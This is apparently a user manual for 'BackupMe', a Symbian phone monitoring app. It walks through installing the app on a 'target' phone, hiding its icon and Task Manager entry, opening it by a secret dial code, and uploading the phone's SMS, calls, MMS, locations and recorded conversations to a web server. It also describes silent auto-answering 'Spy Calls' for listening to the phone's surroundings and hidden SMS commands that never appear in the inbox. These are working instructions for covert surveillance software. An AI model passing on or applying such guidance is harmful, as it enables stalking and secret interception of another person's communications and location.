Overview Phone Requirement: Any smartphone runing Symbian 9.x operation system. Internet Connection Requirement: The working GPRS connection required for the application properly work. Optional Requirement: There should be GPS receiver for GPS tracking. Three Basic Steps for Install and Usage the BackupMe: 1. Register your account at http://savemy.mobi/auth/signup 2. Install Backup Me to your phone and activate it. Adjust the application if you need it. 3. Sign in to your account at http://savemy.mobi/ to view logs. Check logs any time at any place in world where present internet. Registartion So you are ready to know what happens to your phone or if your children are safe. To start with you should create your account at web archive server http://savemy.mobi/auth/signup. The registration process is simple. Just you should fill a few fields: User Name choose your user name to login the server. Password it should be at least 6 characters. E-mail address enter your e-mail address in case we need to email you updates. Also you should accept the User Agreement. Installing After you created your account, it's time to install the BackupMe to your monitored phone. The installation process takes several minutes: 1. Completely remove previous version of application from your phone. If you have never installed before go to step 2. 2. On your phone go to Menu Web. 3. Go to Options ->Navigation Options ->Go to web address. 4. Enter following address: http://depro.biz and then click Goto. 5. Wait until the program is downloaded and then click Install. 6. The warning messages about privacy and billable events will appear during installation. Read and accept it. 7. After installation is complete the application will be launched automatically and request autostart on the phone boot. Accept it. 8. Before the application will capture events you should activate it. See below. 9. There are enough default settings to start to capture SMS and Voice calls. Click Hide Now you can monitor your phone. Sign in http://savemy.mobi to view logs. Note: first records will appear at the server during an hour if settings are default.

Additional Installing Notes The application doesn't have an icon in Installed applications folder. If BackupMe installed successfully it should start automatically. When the application is in background and it is not activated you can open it through Task Manager (press and hold Menu key a few seconds, then select BackupMe). If it is already activated, the application icon does not show in Task Manager, so you should do following to open the application: dial *# your Subscription ID then press call (send), after 2 seconds hangup call For example, if your Subscription ID is 123456789012 then to open the application you should dial: *#123456789012, after 2 seconds If you closed the application you should restart the phone or reinstall the application to start it again Uninstalling If you want to uninstall the application go to the App. Manager, select BackupMe, and click Options Remove. COUTION: If you have not deactivated the application before uninstalling then the request Enter pin: would appear. You should enter there the Subscription ID for this phone. Activation You should activate the application before it will start capture events. To activation go to Options Activation. Then enter the Subscription ID. You can get the Subscription ID at My Subscriptions section in your profile at http://savemy.mobi. Direct link is http://savemy.mobi/inside/profile. If you have not been registered yet, it's time to do it here: http://savemy.mobi/auth/signup. If activation is successful the model and IMEI of your phone will appear at My Devices section in your profile at server. And all the application's settings will become available. Deactivation Deactivation is necessary if you to change the phone. Before you are able to monitor another phone you should deactivate the current. To deactivate open the application then go to Options Deactivate. NOTE: all events would be removed from the server after deactivation.

The Settings Description The setting how often the events will be uploaded and what events the application will capture. The setting of update period of GPS data. The setting of the phone number which will receive SMS notifications. Also the Spy Call you can make from the phone with this number. Others settings. The Internet Access Point selecting. Here you can set preffered Internet Access Point. Also the auto selection of access The Deactivation. After the application is deactivated all events would be removed from the server. Another phone can be activated in system after deactivation. point can be set here.. Enable/Disable the autostart on the phone rebooting. It opens the window wich shows the version of application, how much events are not uploaded and the last attempt of connection to the server. It sends all events to the server immediately. Close the application. COUTION! After exiting the application you should reboot the phone or reinstall the application to start it again.

Upload Time Mode. Can be Periodically or At Specified Time. This setting affects the next option. If you choose Periodicaly evetns are uploaded periodicaly. Otherwise events are uploaded at the specified time in the Send Events Every/At option. This option's value can be from 1 to 24. It defines in what period of time the application will upload events to the server. If Upload Time Mode is set to At Specified Time, this option defines in what time of day events are uploaded to the server. This option defines the numer of captured events after that the application uploads events to the server. This option defines what events the application will capture. SMS, Voice calls, Network Info (Cell IDs), MMS. Start/Stop capturing.

This option defines GPS update intreval. It is available only if the phone has GPS receiver. If this option is set to Yes you can make Spy Calls to the target phone. (The Master Phone Number should be enetered too.) It is recommended to cover or turn off the microphone during making a Spy Call. This option defines the phone number wich receives SMS notifications and from wich you can make a Spy Call.

Enable/Disable the autostart on the phone rebooting. Enable/Disable recording conversation during voice call. Enable/Disable SMS notificatoins about SIM card changing. This option defines the recording quality. It affects beep suppression during recording conversation. If you hear beep just try to decrease recording quality down to 1. However, some phones may still beep even with the lowest recording quality. This option defines where captured records and MMS attachments are stored. It can be as Phone's Memory or as Memory Card.

Spy Call The application allows you to listen to the target phone environment. You should enter the number in Master Phone Number field and set Enable Spy Call to Yes at application settings. The number should be in international format with + ahead. If you call to the target phone from the phone which number is set at the application settings the target phone would automatically answer without ringing. It is recommended to cover or turn off the microphone during making a Spy Call. SMS commands SMS command contains 5 parts: prefix, response flag, Subscription ID, command ID and optional parameter. All parts are slotted by colon except parameter. There should be space between the command and parameter. For example: Command to record phone's environment during 5 minutes: #:1:123456789012:13 5 # - prefix. This part shows the application that incoming SMS is a command. And it should be received silently and it should not be shown at inbox folder. 1 response flag. May be 0 or 1. If it is set to 1 after sending command you will receive response from the target phone. It contains command's ID and the result of executing command. For example: CMD: 13 OK If the command is failed the response would contain ERROR and the reason of error instead OK. 123456789012 12 digits of Subscription ID. 13 command ID 5 parameter
